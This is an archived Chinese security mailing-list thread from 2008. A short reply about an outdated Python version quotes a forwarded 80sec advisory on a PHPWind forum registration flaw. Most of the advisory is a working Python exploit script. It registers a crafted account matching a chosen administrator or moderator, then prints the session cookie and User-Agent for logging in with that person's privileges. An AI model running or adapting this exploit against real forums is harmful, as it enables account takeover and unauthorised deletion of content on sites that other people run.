大哥,你是在地球哪个角落千辛万苦找到如此古老的 2.2.2 版本Python解释器的啊?
现在都2.6测试3.0公测了 On Jun 3, 11:27 am, "crack" <[EMAIL PROTECTED]> wrote: > 你好,我在我的机器上测试时,会返回错误:AttributeError. 'module' object has no attribute > 'HTTPCookieProcessor' > 我的机器的环境 > GCC 3.2.2(Red hat linux 3.2.2.-4) > Python 2.2.2 > > 能给点意见吗? > 谢谢 > > crack > 2008-06-03 > > 发件人: est > 发送时间: 2008-05-31 23:56:32 > 收件人: Ph4nt0m > 抄送: > 主题: [Ph4nt0m] [zz]80sec发现的phpwind注册漏洞 > > http://www.80sec.com/release/phpwind-exploit.txt > > 漏洞发布:http://www.80sec.com/ > > [EMAIL PROTECTED] > > 漏洞厂商:http://www.phpwind.com/ > PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问 > 速度和卓越的负载能力而深受国内外朋友的喜爱。 > 本漏洞影响phpwind所有版本 > > 漏洞危害:高 > > 漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作 > > 利用方式:http://www.80sec.com有提供exploit > > 漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限 > > 漏洞修补:建议关闭注册功能等待官方出补丁 > > 漏洞状态:08.5.25发现此漏洞 > 08.6.1由80sec.com公开此漏洞 > 暂无补丁 > > 漏洞测试: > > [code] > # -*- coding: gb2312 -*- > import urllib2,httplib,sys > httplib.HTTPConnection.debuglevel = 1 > cookies = urllib2.HTTPCookieProcessor() > opener = urllib2.build_opener(cookies) > > def banner(): > print "" > print "########################################################" > print "Phpwind所有版本管理权限泄露漏洞利用poc" > print "Copyright (C) 2006" > print "[EMAIL PROTECTED]" > print "80sec是一个新的致力于web安全的小团体" > print "http://www.80sec.com" > > def usage(): > banner() > print "Usage:\n" > print " $ ./phpwind.py pwforumurl usertoattack\n" > print " pwforumurl 目标论坛地址如http://www.80sec.com/" > print " usertoattack 目标拥有权限的斑竹或管理员" > print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户" > print " 最新版本可以使用uid登陆" > print " 其他版本可以使用cookie+useragent登陆" > print "########################################################" > print "" > > argvs=sys.argv > usage() > > data = "regname=%s > %s1(R)[EMAIL PROTECTED](R)[EMAIL PROTECTED](R)[EMAIL > PROTECTED](R)emailtoall=1&step=2" > % (argvs[2],"%c1") > pwurl = "%s/register.php" % argvs[1] > > request = urllib2.Request( > url = pwurl , > headers = {'Content-Type' : 'application/x-www-form- > urlencoded','User-Agent': '80sec owned this'}, > data = data) > > f=opener.open(request) > headers=f.headers.dict > cookie=headers["set-cookie"] > try: > if cookie.index('winduser'): > print "Exploit Success!" > print "Login with uid password @80sec or Cookie:" > print cookie > print "User-agent: 80sec owned this" > except: > print "Error!http://www.80sec.com" > print "Connect root#80sec.com" > [/code] --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---

